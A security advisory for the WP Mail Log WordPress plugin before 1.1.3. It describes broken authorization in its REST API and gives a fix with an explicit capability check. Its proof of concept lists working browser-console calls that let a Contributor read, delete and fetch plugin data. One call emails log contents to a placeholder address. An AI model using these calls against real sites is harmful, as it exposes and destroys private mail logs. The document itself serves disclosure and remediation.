WP Mail Log < 1.1.3 – Incorrect Authorization in REST API Endpoints

Description

The plugin does not correctly authorize its REST API endpoints, allowing users with the Contributor role to view and delete data that should only be accessible to Admin users.

Proof of Concept

The following actions may be taken by a Contributor user:
---
/wml_logs - Information leak

Execute the following within a block editor page to read the logs:

await wp.apiFetch({path: 'wml/v1/wml_logs', method: 'POST', data: {pageSize: 10}});
---
/wml_logs/delete - Arbitrary log deletion

Execute the following within a block editor page to delete a log entry, ensuring the `data` array includes a valid ID for a log entry:

await wp.apiFetch({path: 'wml/v1/wml_logs/delete', method: 'POST', data: [1]});
---
/settings

Execute the following within a block editor page to get the plugin settings:

await wp.apiFetch({path: 'wml/v1/settings', method: 'POST', data: {callback: 'get'}});
---
/wml_logs/send_mail

Execute the following on any page of the site to send the information within a log to an arbitrary email address, ensuring the `id` parameter is a valid ID for a log entry.

var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();

await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&to_email=send@example.com'})).text();
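The fix on the plugin side is an explicit capability check on every route. The following is an added example and not the WP Mail Log plugin's own code: it registers the two log routes named above with a shared `permission_callback` that requires the `manage_options` capability, so a logged-in Contributor (who can obtain a REST nonce) is still refused. The handler function names are assumptions for illustration.

```php
<?php
// Added example, not the WP Mail Log plugin's own code: register REST routes with an
// explicit permission_callback so only administrators (manage_options) can reach them.
// The route names match the advisory; the function names are assumed for illustration.
add_action( 'rest_api_init', function () {
    register_rest_route( 'wml/v1', '/wml_logs', array(
        'methods'             => 'POST',
        'callback'            => 'wml_example_list_logs',
        'permission_callback' => 'wml_example_require_admin', // omitted or __return_true = public
        'args'                => array(
            'pageSize' => array( 'type' => 'integer', 'default' => 10, 'minimum' => 1, 'maximum' => 100 ),
        ),
    ) );
    register_rest_route( 'wml/v1', '/wml_logs/delete', array(
        'methods'             => 'POST',
        'callback'            => 'wml_example_delete_logs',
        'permission_callback' => 'wml_example_require_admin',
    ) );
} );

// Shared permission check. Returning WP_Error (not plain false) gives the caller a
// proper 401/403 JSON error; a logged-in Contributor fails the capability test.
function wml_example_require_admin( WP_REST_Request $request ) {
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_not_logged_in', 'Authentication required.', array( 'status' => 401 ) );
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error( 'rest_forbidden', 'Administrator access required.', array( 'status' => 403 ) );
    }
    return true;
}

function wml_example_list_logs( WP_REST_Request $request ) {
    $page_size = (int) $request->get_param( 'pageSize' ); // already validated against 'args'
    $logs      = array(); // placeholder: read up to $page_size rows from the plugin's log table
    return rest_ensure_response( array( 'pageSize' => $page_size, 'logs' => $logs ) );
}

function wml_example_delete_logs( WP_REST_Request $request ) {
    // The advisory's PoC posts a bare JSON array of IDs; coerce each to a positive integer.
    $ids = array_filter( array_map( 'absint', (array) $request->get_json_params() ) );
    // placeholder: delete only rows whose IDs are in $ids
    return rest_ensure_response( array( 'deleted' => array_values( $ids ) ) );
}
```

Since WordPress 5.5, registering a route without a `permission_callback` raises a `_doing_it_wrong` notice, which is a useful signal when auditing a plugin for this class of bug.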

Affects Plugins

WP Mail Log – Fixed in 1.1.3

References

Classification

Type
INCORRECT AUTHORISATION
CWE
CVSS

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes

Timeline

Publicly Published
2023-11-28 (about 7 months ago)
Added
2023-11-28 (about 7 months ago)
Last Updated
2023-11-28 (about 7 months ago)